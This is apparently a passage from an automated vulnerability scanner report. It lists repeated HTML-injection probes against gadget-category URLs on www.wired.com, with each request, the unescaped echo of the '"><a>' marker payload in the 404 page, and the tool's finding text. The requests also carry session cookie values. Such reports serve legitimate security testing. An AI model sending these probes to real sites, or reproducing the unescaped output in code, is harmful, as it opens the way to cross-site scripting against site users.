GET /gadgets20f24"><a>01629cf0b9a/digitalcameras HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Sun, 21 Nov 2010 23:11:26 GMT Date: Sun, 21 Nov 2010 23:07:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets20f24"><a>01629cf0b9a ss_digitalcameras"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0fc"><a>827ec64b19b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/digitalcamerascb0fc"><a>827ec64b19b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:57 GMT Date: Sun, 21 Nov 2010 23:07:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_digitalcamerascb0fc"><a>827ec64b19b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfac"><a>5cabf0c5d32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets4bfac"><a>5cabf0c5d32/displays HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:11:43 GMT Date: Sun, 21 Nov 2010 23:07:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets4bfac"><a>5cabf0c5d32 ss_displays"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db025"><a>555d174deea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/displaysdb025"><a>555d174deea HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:07 GMT Date: Sun, 21 Nov 2010 23:08:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_displaysdb025"><a>555d174deea"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba86"><a>e8f52bb4221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgetsdba86"><a>e8f52bb4221/gadgetreviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:11:57 GMT Date: Sun, 21 Nov 2010 23:07:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgetsdba86"><a>e8f52bb4221 ss_gadgetreviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e399"><a>cebb494f95a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/gadgetreviews1e399"><a>cebb494f95a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:32 GMT Date: Sun, 21 Nov 2010 23:08:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_gadgetreviews1e399"><a>cebb494f95a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d93"><a>5fa7d6b4d51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgetsa8d93"><a>5fa7d6b4d51/mac HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Sun, 21 Nov 2010 23:11:41 GMT Date: Sun, 21 Nov 2010 23:08:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgetsa8d93"><a>5fa7d6b4d51 ss_mac"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821e8"><a>04b40dd3412 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/mac821e8"><a>04b40dd3412 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=551 Expires: Sun, 21 Nov 2010 23:17:48 GMT Date: Sun, 21 Nov 2010 23:08:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_mac821e8"><a>04b40dd3412"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90641"><a>ba5864f027 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets90641"><a>ba5864f027/miscellaneous HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29360 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:03 GMT Date: Sun, 21 Nov 2010 23:08:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets90641"><a>ba5864f027 ss_miscellaneous"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae2a5"><a>4df9c3f8bcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/miscellaneousae2a5"><a>4df9c3f8bcc HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:38 GMT Date: Sun, 21 Nov 2010 23:08:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_miscellaneousae2a5"><a>4df9c3f8bcc"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6cc"><a>2ec7c30f53a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets5c6cc"><a>2ec7c30f53a/mods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29344 Vary: Accept-Encoding Cache-Control: max-age=231 Expires: Sun, 21 Nov 2010 23:12:08 GMT Date: Sun, 21 Nov 2010 23:08:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets5c6cc"><a>2ec7c30f53a ss_mods"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edc27"><a>e4a182d7a54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/modsedc27"><a>e4a182d7a54 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29344 Vary: Accept-Encoding Cache-Control: max-age=595 Expires: Sun, 21 Nov 2010 23:18:45 GMT Date: Sun, 21 Nov 2010 23:08:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_modsedc27"><a>e4a182d7a54"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29290"><a>3e97c83f0a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets29290"><a>3e97c83f0a7/pcs HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:18 GMT Date: Sun, 21 Nov 2010 23:08:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets29290"><a>3e97c83f0a7 ss_pcs"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea349"><a>abc8fc5b833 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/pcsea349"><a>abc8fc5b833 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:47 GMT Date: Sun, 21 Nov 2010 23:08:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_pcsea349"><a>abc8fc5b833"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139b1"><a>6824c99afe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets139b1"><a>6824c99afe8/portablemusic HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Sun, 21 Nov 2010 23:12:16 GMT Date: Sun, 21 Nov 2010 23:08:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets139b1"><a>6824c99afe8 ss_portablemusic"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9890b"><a>1a2bf9e403d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/portablemusic9890b"><a>1a2bf9e403d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:52 GMT Date: Sun, 21 Nov 2010 23:08:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_portablemusic9890b"><a>1a2bf9e403d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45461"><a>16a5e5e1666 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets45461"><a>16a5e5e1666/wireless HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:23 GMT Date: Sun, 21 Nov 2010 23:08:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets45461"><a>16a5e5e1666 ss_wireless"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd750"><a>8d8676eb6a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/wirelessbd750"><a>8d8676eb6a9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=597 Expires: Sun, 21 Nov 2010 23:18:52 GMT Date: Sun, 21 Nov 2010 23:08:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_wirelessbd750"><a>8d8676eb6a9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4899"><a>1ca469d09ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
